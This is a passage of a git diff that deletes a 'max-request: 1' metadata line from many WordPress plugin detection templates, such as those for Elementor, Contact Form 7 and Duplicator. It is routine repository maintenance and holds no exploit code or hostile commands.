     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
